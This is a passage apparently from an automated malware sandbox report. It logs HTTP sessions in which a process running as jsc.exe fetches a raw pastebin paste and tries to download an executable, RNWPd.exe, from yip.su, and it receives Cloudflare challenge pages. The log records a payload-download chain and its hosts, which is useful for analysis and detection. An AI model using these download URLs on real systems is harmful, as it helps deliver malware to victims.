                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '92654',cRay: '8b4cfb813db741b4',cHash: 'd6cc94900a126f1',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=vTx8Oi0WZAxKesJh.WbGv567EaOnIyty0kopM3kGI94-1723932503-0.0.1.1-4116",cFPWv: 'g',cTTim
                                    2024-08-17 22:08:23 UTC1369INData Raw: 58 58 59 79 67 32 6f 37 78 41 33 41 43 77 53 51 4e 59 78 71 6c 57 34 46 45 36 69 68 64 55 45 6f 75 69 51 58 7a 43 6b 6a 57 64 59 73 77 48 64 51 52 51 61 48 76 46 34 54 6a 4c 50 57 73 46 39 58 76 53 56 68 79 53 38 6b 30 70 70 4b 39 73 6d 6d 58 53 37 37 4f 55 6d 38 6e 4f 75 39 59 4d 7a 6d 79 56 58 4c 4a 45 77 53 4d 6a 2e 57 4b 75 42 51 71 38 77 79 52 6a 77 63 6e 58 79 6c 43 69 61 79 37 56 67 43 45 50 4a 79 63 37 53 65 65 50 42 43 75 32 76 43 70 34 78 71 34 59 46 73 75 39 55 59 6f 5f 64 6e 35 62 41 44 5a 63 42 67 52 34 79 4b 59 68 54 56 62 51 6d 53 75 37 61 62 61 42 78 77 77 6d 38 30 44 45 77 70 77 49 46 4a 31 72 72 6d 5a 4d 36 51 6b 37 41 54 44 41 41 36 48 56 70 6c 53 44 51 30 70 4e 73 67 48 35 76 32 68 51 70 2e 70 50 6f 65 6b 6a 4a 44 54 4a 6c 57 72 73 4a
                                    Data Ascii: XXYyg2o7xA3ACwSQNYxqlW4FE6ihdUEouiQXzCkjWdYswHdQRQaHvF4TjLPWsF9XvSVhyS8k0ppK9smmXS77OUm8nOu9YMzmyVXLJEwSMj.WKuBQq8wyRjwcnXylCiay7VgCEPJyc7SeePBCu2vCp4xq4YFsu9UYo_dn5bADZcBgR4yKYhTVbQmSu7abaBxwwm80DEwpwIFJ1rrmZM6Qk7ATDAA6HVplSDQ0pNsgH5v2hQp.pPoekjJDTJlWrsJ


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.549730104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:28 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:28 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfba268977281-EWR
                                    2024-08-17 22:08:28 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:28 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:28 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:28 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.549731188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:29 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:29 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:29 UTC679INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 51 78 31 75 49 38 74 67 78 7a 46 72 41 51 32 4f 46 70 4f 38 45 71 37 35 4c 43 73 68 69 56 30 6f 67 47 72 6d 48 38 45 4e 36 45 42 4a 68 68 48 4b 69 35 62 62 69 4a 44 7a 6e 68 6d 49 74 58 54 6e 57 31 65 4e 42 61 31 6c 6b 74 52 48 59 58 69 6c 6c 6d 30 54 51 5a 43 4e 34 65 6c 63 4c 4b 77 38 79 50 65 59 6b 4a 65 72 68 34 73 3d 24 65 57 69 36 6a 36 30 38 6d 72 34 6d 38 56 34 76 61 50 36 37 52 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: Qx1uI8tgxzFrAQ2OFpO8Eq75LCshiV0ogGrmH8EN6EBJhhHKi5bbiJDznhmItXTnW1eNBa1lktRHYXillm0TQZCN4elcLKw8yPeYkJerh4s=$eWi6j608mr4m8V4vaP67Rg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:29 UTC1369INData Raw: 33 64 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de6<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:29 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:08:29 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:29 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:29 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:29 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:08:29 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:08:29 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 38 35 34 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 62 61 36 36 38 35 39 34 32 62 35 27 2c 63 48 61 73 68 3a 20 27 61 32 30 39 64 35 34 34 66 31 62 62 34 30 30 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 37 5a 67 2e 69 66 50 43 6f 7a 38 70 6b 71 67 57 77 4a 71 31 51 36 64 4f 67 59 33 47 52 58 30 39 64 45 41 7a 31 43 34 67 6b 63 63 2d 31 37 32 33 39 33 32 35 30 39 2d 30 2e 30 2e 31 2e 31 2d 34 31 31 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d 65
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '9854',cRay: '8b4cfba6685942b5',cHash: 'a209d544f1bb400',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=7Zg.ifPCoz8pkqgWwJq1Q6dOgY3GRX09dEAz1C4gkcc-1723932509-0.0.1.1-4116",cFPWv: 'g',cTTime
                                    2024-08-17 22:08:29 UTC1369INData Raw: 59 64 49 36 4e 56 43 5a 67 58 78 31 56 53 44 72 75 65 47 33 48 69 61 32 55 7a 53 5a 58 68 56 57 72 6b 74 66 34 65 31 62 34 6f 78 6c 5f 31 4a 37 49 5a 45 79 45 30 31 32 4a 37 69 74 53 4b 55 73 58 6c 64 45 70 43 68 4c 70 59 37 7a 50 35 59 36 67 6e 6d 41 53 33 42 48 6b 34 5f 67 4c 51 46 79 59 70 4c 4f 69 73 44 4f 2e 58 32 48 4a 6f 72 34 72 36 6b 76 49 45 6b 62 36 43 33 67 75 4d 5f 64 51 79 5a 6c 54 56 33 51 6b 77 66 30 77 78 2e 7a 66 7a 61 58 57 2e 68 48 53 67 6a 79 70 4a 4d 39 57 67 55 74 44 69 45 31 63 58 6d 34 74 2e 68 65 4c 7a 69 51 55 59 70 5f 39 53 68 68 42 76 6d 74 73 5a 53 4d 4c 32 77 63 70 77 4d 52 34 30 79 64 6d 79 68 32 35 36 42 4f 77 7a 33 64 73 66 31 4d 64 52 4d 42 33 7a 47 30 65 61 32 41 47 63 64 79 52 4f 41 4c 6e 6f 74 6d 54 70 46 34 68 4c 52
                                    Data Ascii: YdI6NVCZgXx1VSDrueG3Hia2UzSZXhVWrktf4e1b4oxl_1J7IZEyE012J7itSKUsXldEpChLpY7zP5Y6gnmAS3BHk4_gLQFyYpLOisDO.X2HJor4r6kvIEkb6C3guM_dQyZlTV3Qkwf0wx.zfzaXW.hHSgjypJM9WgUtDiE1cXm4t.heLziQUYp_9ShhBvmtsZSML2wcpwMR40ydmyh256BOwz3dsf1MdRMB3zG0ea2AGcdyROALnotmTpF4hLR


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.549732104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:34 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:34 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfbc63f5d0f6b-EWR
                                    2024-08-17 22:08:34 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
